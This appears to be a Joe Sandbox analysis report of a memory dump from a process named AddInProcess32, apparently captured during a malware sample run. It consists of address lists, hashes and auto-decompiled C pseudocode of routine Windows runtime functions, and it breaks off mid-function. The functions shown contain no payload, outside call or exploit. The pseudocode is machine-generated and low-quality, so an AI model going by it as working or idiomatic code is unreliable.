0x018c7a5b
0x018c7a5c
0x018c7a5d
0x018c7a63
0x018c7a64
0x018c7a6a
0x018c7a6c
0x018c7a6e
0x018c79cb
0x018c79cb
0x018c79ce
0x018c79d0
0x018c7a98
0x018c7a9b
0x018c7a9b
0x018c7a9e
0x018c7aa1
0x018c7bbe
0x018c7bbe
0x018c7bc0
0x018c7be0
0x018c7be0
0x018c7a01
0x018c7a01
0x018c7a05
0x018c7a07
0x018c7a15
0x018c7a15
0x018c7a1a
0x00000000
0x018c7a1a
0x018c7bc2
0x018c7bc6
0x018c7bc9
0x018c7bcd
0x018c7bcf
0x018c79e6
0x018c79e6
0x018c79eb
0x018c79eb
0x018c79ef
0x018c79f1
0x00000000
0x00000000
0x018c79f3
0x018c79f5
0x018c79ff
0x018c79ff
0x00000000
0x018c79ff
0x018c79f7
0x018c79fd
0x00000000
0x00000000
0x00000000
0x018c79fd
0x018c7bd5
0x018c7bd8
0x00000000
0x00000000
0x018c7ba9
0x018c7bac
0x018c7bb0
0x018c7bb1
0x018c7bb1
0x018c7bb6
0x00000000
0x018c7bb6
0x018c7aa7
0x018c7aaa
0x00000000
0x00000000
0x018c7ab2
0x018c7ab3
0x018c7ab5
0x018c7aec
0x018c7aef
0x018c7b25
0x018c7b28
0x018c7b62
0x018c7b64
0x018c7b8f
0x018c7b92
0x018c7b96
0x018c7b98
0x00000000
0x00000000
0x018c7b9e
0x018c7b9f
0x018c7ba3
0x00000000
0x018c7ba3
0x018c7b66
0x018c7b68
0x018c7ae2
0x018c7ae2
0x00000000
0x018c7ae2
0x018c7b6e
0x018c7b72
0x018c7b75
0x018c7b81
0x018c7b85
0x018c7b87
0x00000000
0x00000000
0x018c7b31
0x018c7b34
0x018c7b3c
0x018c7b45
0x018c7b46
0x018c7b4f
0x018c7b51
0x018c7b57
0x018c7b59
0x018c7b59
0x00000000
0x018c7b59
0x018c7b77
0x00000000
0x018c7b77
0x018c7b2a
0x00000000
0x018c7b2a
0x018c7af1
0x018c7af3
0x00000000
0x00000000
0x018c7afb
0x018c7afc
0x018c7afe
0x00000000
0x00000000
0x018c7b00
0x018c7b03
0x00000000
0x00000000
0x018c7b05
0x018c7b09
0x018c7b0d
0x018c7b0f
0x00000000
0x00000000
0x018c7b18
0x018c7b1d
0x00000000
0x018c7b1d
0x018c7ab7
0x018c7ab9
0x00000000
0x00000000
0x018c7abf
0x018c7ac1
0x00000000
0x00000000
0x018c7ac3
0x018c7ac6
0x00000000
0x00000000
0x018c7ac8
0x018c7acc
0x018c7ad0
0x018c7ad2
0x00000000
0x00000000
0x018c7adb
0x00000000
0x018c7adb
0x018c79d6
0x018c79d9
0x018c79dc
0x018c7a91
0x018c7a94
0x00000000
0x018c7a94
0x018c79e2
0x00000000
0x018c79e2
0x018c7a74
0x018c7a7a
0x00000000
0x00000000
0x018c7a8a
0x018c7a21
0x018c7a21
0x00000000
0x018c7a21
0x0185c650
0x0185c651
0x0185c656
0x0185c65c
0x0185c65d
0x0185c663
0x0185c664
0x0185c66a
0x0185c66e
0x018c79c5
0x018c79c7
0x00000000
0x018c79c7
0x0185c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02540c8fef4319c453aac1e83dc10682276c73dbd9174f19131f7a34038f40a8
Instruction ID: af994b265394e14a9fa008b3b62fc916ceac980b0b0d7284b6102503d88f53df
Opcode Fuzzy Hash: 02540c8fef4319c453aac1e83dc10682276c73dbd9174f19131f7a34038f40a8
Instruction Fuzzy Hash: 978191756042069BDB26CE5CC880A7A77E9FB84B54F14482EEE45DB241D330EF45CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 018EB8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E018EB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1947b9c; // 0x0
				_t124 = L01874620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01899800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E018995B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E018995D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L018777F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01899910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E018995D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1947b9c; // 0x0
									_t92 = L01874620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01899910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0185A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E018EE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E018EE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E018995B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x018eb8d9
0x018eb8e4
0x00000000
0x018eb8e6
0x018eb8f3
0x018eb8f5
0x018eb8f5
0x018eb8f8
0x018eb920
0x018eb924
0x018eb936
0x018eb939
0x018eb93d
0x018eb948
0x018eb9a0
0x018eb9a0
0x018eb9a4
0x018eb9bf
0x018eb9c4
0x018eb9c6
0x018eb9cd
0x018eb9d1
0x018ebad4
0x018ebad8
0x018ebada
0x018ebadc
0x018ebadc
0x018ebadf
0x018ebae0
0x018ebae2
0x018ebae4
0x018ebaec
0x018ebaee
0x018ebaf0
0x018ebaf0
0x018ebaec
0x018ebafb
0x018ebafc
0x018ebafe
0x018ebb01
0x018ebb01
0x00000000
0x018ebb06
0x018eb9d7
0x018eb9db
0x018eb9db
0x018eb9de
0x018eb9de
0x018eb9e4
0x018eb9e7
0x018eb9ea
0x018eb9ec
0x018eb9ef
0x018eb9f3
0x018eba1b
0x018eba1b
0x018eba23
0x018eba24
0x018eba27
0x018eba2a
0x018eba2b
0x018eba2e
0x018eba30
0x018eba37
0x018eba3f
0x018eba9c
0x018ebaa2
0x018ebb13
0x018ebb15
0x018ebaae
0x018ebaae
0x018ebab3
0x018ebab5
0x018ebaba
0x018ebac8
0x018ebac8
0x018ebaba
0x018ebacd
0x018ebacf
0x00000000
0x018ebacf
0x018ebb1a
0x00000000
0x018ebb1c
0x018ebaa7
0x018ebb11
0x00000000
0x018ebb11
0x018ebaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x018eba41
0x018eba41
0x018eba41
0x018eba58
0x018eba5d
0x018eba62
0x00000000
0x00000000
0x018eba64
0x018eba67
0x018eba68
0x018eba69
0x018eba6c
0x018eba6f
0x018eba71
0x018eba78
0x018eba80
0x00000000
0x00000000
0x018eba90
0x018eba90
0x018eba97
0x00000000
0x018eba97
0x018eb9f5
0x018eb9f7
0x018eb9f7
0x018eb9fa
0x018eba03
0x018eba07
0x018eba0c
0x018eba10
0x018eba17
0x00000000
0x018eb9f7
0x018eb9a6
0x018eb9a8
0x018eb9af
0x018eb9b3
0x00000000
0x00000000
0x018eb9b9
0x00000000
0x018eb9b9
0x018eb94d
0x018eb98f
0x018eb995
0x018eb999
0x018eb960
0x018eb967
0x018eb968
0x018eb96a
0x00000000
0x018eb96a
0x018eb99b
0x018eb99e
0x00000000
0x00000000
0x00000000
0x018eb99e
0x018eb951
0x018eb954
0x018eb95a
0x018eb95e
0x018eb972
0x018eb979
0x018eb97d
0x018eb97f
0x018eb980
0x018eb982
0x018eb984
0x00000000
0x018eb984
0x00000000
0x018eb926
0x00000000
0x018eb926

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b34617623144f46ab4dd541a22630a644c62e5ca466a07a2a1115876d40f3a7
Instruction ID: 38916c721fd8635852a84eabe5944a807f7775cae3b1f9275dc0a13694d3170b
Opcode Fuzzy Hash: 2b34617623144f46ab4dd541a22630a644c62e5ca466a07a2a1115876d40f3a7
Instruction Fuzzy Hash: 14710032200706EFEB32DF18C848F66BBE5EF42724F144528E655DB6A1EB71EA41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 018D6DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E018D6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E018D6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01877D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01899AE0();
					_t87 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E018D795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E018D795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E018D795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E018D795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01874620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E018D6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E018D6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E018D6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E018D6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01877D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01899AE0();
								L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01872400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01872400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01872400( &_v52);
							}
							if(_v28 >= 0) {
								return L01872400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x018d6dd4
0x018d6dde
0x018d6de1
0x018d6de3
0x018d6de6
0x018d6de9
0x018d6dec
0x018d6def
0x018d6df2
0x018d6df5
0x018d6dfe
0x018d6e04
0x018d6e09
0x018d6e0d
0x018d6e18
0x018d6e1b
0x018d6e22
0x018d6e2d
0x018d6e30
0x018d6e36
0x018d6e42
0x018d6e4d
0x018d6e50
0x018d6e55
0x018d6e5c
0x018d6e6e
0x018d6e5e
0x018d6e67
0x018d6e67
0x018d6e73
0x018d6e74
0x018d6e77
0x018d6e7c
0x018d6e7d
0x018d6e8e
0x018d6e93
0x018d6e9c
0x018d6ea8
0x018d6eab
0x018d6eac
0x018d6eb3
0x018d6ecd
0x018d6edc
0x018d6ee2
0x018d6ee5
0x018d6ef2
0x018d6efb
0x018d6f01
0x018d6f06
0x018d6f0b
0x018d6f11
0x018d6f1a
0x018d6f22
0x018d6f26
0x018d6f26
0x018d6f33
0x018d6f41
0x018d6f44
0x018d6f47
0x018d6f54
0x018d6f65
0x018d6f77
0x018d6f7c
0x018d6f82
0x018d6f91
0x018d6f99
0x018d6fa3
0x018d6fae
0x018d6fae
0x018d6fba
0x018d6fbb
0x018d6fbc
0x018d6fc1
0x018d6fc2
0x018d6fd3
0x018d6fd8
0x018d6fd8
0x018d6fdf
0x018d6fe8
0x018d6fee
0x018d6fee
0x018d6ff5
0x018d6ffb
0x018d6ffb
0x018d7004
0x00000000
0x018d700a
0x018d7004
0x018d6eb3
0x018d6e9c
0x018d7015

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 434e3597f61e43f35cb431fd1f6a416703cc7efa978e68070ebce54c473aee65
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 4B716D71A0061AEFDB10DFA9C984EEEBBB9FF48714F144469E505E7250EB34EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 018552A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E018552A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0186EEF0(0x19479a0);
					_t104 =  *0x1948210; // 0x12e2c88
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0186EB70(_t93, 0x19479a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01899890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0186EEF0(0x19479a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0186EB70(0, 0x19479a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x12e2c95
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0188F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0186EEF0(0x19479a0);
									__eflags =  *0x1948210 - _t104; // 0x12e2c88
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1948210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E018D4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0186EB70(_t95, 0x19479a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E018995D0();
											L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E018995D0();
											L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0186EB70(_t93, 0x19479a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E018995D0();
										L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E018995D0();
										L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0188F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x018552a5
0x018552ad
0x018552b0
0x018552b3
0x018552b7
0x018552ba
0x018552bf
0x018552c4
0x018552cc
0x00000000
0x00000000
0x018552ce
0x018552d9
0x018552dd
0x018552e7
0x018552f7
0x018552f9
0x018552fd
0x018b0dcf
0x018b0dd5
0x018b0dd6
0x018b0dd7
0x018b0dd8
0x018b0dd9
0x018b0dde
0x018b0ddf
0x018b0de0
0x018b0de1
0x018b0de2
0x018b0de5
0x018b0dea
0x018b0dec
0x018b0f60
0x018b0f64
0x018b0f70
0x018b0f76
0x018b0f79
0x018b0f79
0x00000000
0x018b0f64
0x018b0df2
0x018b0df7
0x018b0e04
0x018b0e0d
0x018b0e0d
0x018b0e10
0x018b0e1a
0x018b0e1c
0x018b0e4c
0x018b0e52
0x018b0e61
0x018b0e67
0x018b0e6b
0x018b0e70
0x018b0e76
0x018b0ed7
0x018b0edc
0x018b0ee0
0x018b0ee6
0x018b0eea
0x018b0eed
0x018b0ef0
0x018b0ef3
0x018b0ef6
0x018b0ef9
0x018b0efe
0x018b0f01
0x018b0f01
0x018b0f0b
0x018b0f12
0x018b0f16
0x018b0f18
0x018b0f1b
0x018b0f2c
0x018b0f31
0x018b0f31
0x018b0f35
0x018b0f39
0x018b0f3a
0x018b0f3c
0x018b0f3f
0x018b0f50
0x018b0f55
0x018b0f55
0x018b0f59
0x018552eb
0x018552f1
0x018552f1
0x018b0e7d
0x018b0e84
0x018b0e88
0x018b0e8a
0x018b0e8d
0x018b0e9e
0x018b0ea3
0x018b0ea3
0x018b0ea7
0x018b0eaf
0x018b0eb3
0x018b0eb9
0x018b0eb9
0x018b0ebc
0x018b0ecd
0x018b0ecd
0x00000000
0x018b0eb3
0x018b0e21
0x018b0e2b
0x018b0e2f
0x018b0e30
0x018b0e3a
0x018b0e3f
0x018b0e41
0x00000000
0x00000000
0x018b0e47
0x00000000
0x018b0e47
0x018b0df9
0x018b0dfe
0x00000000
0x00000000
0x00000000
0x018b0dfe
0x01855303
0x01855307
0x00000000
0x01855309
0x00000000
0x01855309
0x01855307
0x018552e9
0x018552e9
0x00000000
0x018552e9
0x0185530e
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e04fc816e1d4cd919315ab1bcc7079c0e7efbb86da6075e6f1fd114df895ad1b
Instruction ID: 69446a6ec3b829c0355ccd240529a861dc6d06e8820c494f8912d315436c31af
Opcode Fuzzy Hash: e04fc816e1d4cd919315ab1bcc7079c0e7efbb86da6075e6f1fd114df895ad1b
Instruction Fuzzy Hash: 7A51DD34205346ABDB21EF68C880B27BBE8FF90754F14091EF999C7651E770EA04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01882AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01882AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1948204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1948208; // 0x1948207
				_t8 = _t57 + 0x1948208; // 0x1948207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1948450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x194821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1946d5c; // 0x7f170654
							_t72 =  *0x1946d5c; // 0x7f170654
							_t75 =  *0x1946d5c; // 0x7f170654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
